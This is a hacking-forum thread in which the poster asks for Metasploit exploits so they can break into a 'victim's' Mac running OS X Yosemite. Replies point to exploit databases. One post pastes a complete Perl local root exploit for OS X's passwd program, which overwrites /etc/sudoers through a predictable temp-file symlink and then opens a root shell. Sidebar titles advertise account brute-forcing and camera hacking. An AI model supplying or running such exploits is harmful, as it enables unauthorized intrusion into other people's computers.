Well, I started to use metasploit and I tried to search some exploits for Mac OS X Yosemite, but there were nothing. Is the OS too safe to get hacked with metasploit or what's the problem? I really want to solve this problem, cause my victims Computer is running on OSX. Any Ideas?
Forum Thread: Any Exploits for Mac OSX?
- Hot
- Active
-
How to:
HACK Android Device with TermuX on Android | Part #1 - Over the Internet [Ultimate Guide]
160
Replies
28 min ago -
Kali Linux Persistence Error:
No Solution on Internet
3
Replies
6 hrs ago -
Forum Thread:
Create and Use Android/Meterpreter/reverse_tcp APK with Msfvenom?
109
Replies
13 hrs ago -
Forum Thread:
Best Mac Antivirus?
1
Replies
18 hrs ago -
Forum Thread:
Hack Instagram Account Using BruteForce
188
Replies
1 day ago -
Forum Thread:
6.SSL Stripping||Encryption Course||SSL Stripping Attack
0
Replies
2 days ago -
Forum Thread:
How to Protect Your Data from Others [#4 Tutorial ] Join Us Now Cyber Security Course
2
Replies
2 days ago -
Forum Thread:
5.Secure Sockets Layer SSL and Transport Layer Security TLS||Beginners Guide to Encryption
0
Replies
4 days ago -
Forum Thread:
HiddenEye problem here
2
Replies
4 days ago -
Forum Thread:
Kali Linux Boot Error
7
Replies
6 days ago -
Forum Thread:
4.What Are Digital Signatures in Encryption||Beginners Guide for Encryption
0
Replies
6 days ago -
Forum Thread:
Proxychains Not Working or Loading??
2
Replies
1 wk ago -
Forum Thread:
how should I start from scratch. I'm a stupid kid
0
Replies
1 wk ago -
Forum Thread:
Does Arp Spoofing Needs Monitor Mode?
0
Replies
1 wk ago -
Forum Thread:
2.Asymmetric Encryption||Encryption Guide For Beginners
0
Replies
1 wk ago -
Forum Thread:
Removing Pay-as-You-Go Meter on Loan Phones.
0
Replies
1 wk ago -
Forum Thread:
AMD RX 580 Driver for Kali LINUX
3
Replies
1 wk ago -
Forum Thread:
How to Hack CCTV Private Cameras
65
Replies
1 wk ago -
Forum Thread:
Hacking Facebook,Twitter,Instagram Account Passwords with BruteForce
153
Replies
2 wks ago -
Forum Thread:
How to Get Social Media Accounts and Real Name from the Footprints Left Behind by a Phone Number
7
Replies
2 wks ago
-
How To:
Conduct Wireless Recon on Bluetooth, Wi-Fi & GPS with Sparrow-wifi
-
How To:
Master Linux with This Extensive 12-Course Bundle
-
How To:
Bypass PowerShell Execution Policy to Pwn Windows
-
How To:
Top 10 Things to Do After Installing Kali Linux
-
How to Hack Wi-Fi:
Cracking WPA2 Passwords Using the New PMKID Hashcat Attack
-
How To:
Buy the Best Wireless Network Adapter for Wi-Fi Hacking in 2019
-
How To:
Crack Any Master Combination Lock in 8 Tries or Less Using This Calculator
-
How To:
Hack WPA & WPA2 Wi-Fi Passwords with a Pixie-Dust Attack Using Airgeddon
-
How To:
The Top 80+ Websites Available in the Tor Network
-
How To:
Gain SSH Access to Servers by Brute-Forcing Credentials
-
How To:
Run Kali Linux as a Windows Subsystem
-
How To:
Brute-Force Nearly Any Website Login with Hatch
-
How To:
Crack Shadow Hashes After Getting Root on a Linux System
-
How To:
Hack WPA WiFi Passwords by Cracking the WPS PIN
-
How To:
The Hacks Behind Cracking, Part 1: How to Bypass Software Registration
-
How To:
Create Custom Wordlists for Password Cracking Using the Mentalist
-
How To:
Find Identifying Information from a Phone Number Using OSINT Tools
-
How To:
Check if Your Wireless Network Adapter Supports Monitor Mode & Packet Injection
-
How To:
Scan for Vulnerabilities on Any Website Using Nikto
-
How To:
Exploit EternalBlue on Windows Server with Metasploit
4 Responses
There are numerous exploits for OS X in Metasploit. Look again. In addition, check exploitdb for exploits or securityfocus.com. There are numerous exploits for OS X. It is far from safe!
Yeah, thanks. But with which kind of program do I use script like this:
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#!/usr/bin/perl
#
# /usr/bin/passwdOSX: local root exploit.
#
# by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)
#
# (Apple) OSX's /usr/bin/passwd program has support for a custom
# passwd file to be used instead of the standard/static path. this
# feature has security issues in the form of editable file(s) being
# made anywheres on the disk and also writing arbitrary data to files.
#
# the first issue will only work if the file does not already exist,
# it is done using "umask 0;/usr/bin/passwd -i file -l <filename>".
# the second issue is once a successful password change has occured
# /usr/bin/passwd will insecurely re-write the passwd file to
# /tmp/.pwtmp.<pid>, which can be predicted and linked to a file of
# your choice. (this exploits the second issue to overwrite
# /etc/sudoers)
#
# (for some reason this took apple 6 or so months to patch)
use POSIX;
$fakepasswd="/tmp/xpasswd.$$";
$passwdpid=($$ + 1);
$passwdtempfile="/tmp/.pwtmp.$passwdpid";
$sudoers="/etc/sudoers";
sub pexit{print("! @.\n");exit(1);}
print("* /usr/bin/passwdOSX: local root exploit.\n");
print("* by: vade79/v9 v9\@fakehalo.us (fakehalo/realhalo)\n\n");
unlink($fakepasswd);
print("* making fake password file. ($fakepasswd)\n");
open(FP,">$fakepasswd")||pexit("couldn't open/write to $fakepasswd");
# uid must equal the current user.
print(FP "ALL ALL=(ALL) ALL #::" . getuid . ":" . getuid . "::" .
getuid . ":" . getuid . "::/:/\n");
close(FP);
print("* sym-linking $sudoers -> $passwdtempfile.\n");
symlink($sudoers,$passwdtempfile)||pexit("couldn't link files.");
print("* running /usr/bin/passwd on $fakepasswd.\n");
print("* (use ANY password longer than 4 characters)\n\n");
system("/usr/bin/passwd -i file -l $fakepasswd \"ALL ALL=(ALL) ALL #\"");
print("\n* running \"sudo sh\", use your REAL (user) password.\n\n");
system("/usr/bin/sudo sh");
exit(0);
That is a Perl script.
Security Focus is what I use. Sometimes they have the exploits already there.
Share Your Thoughts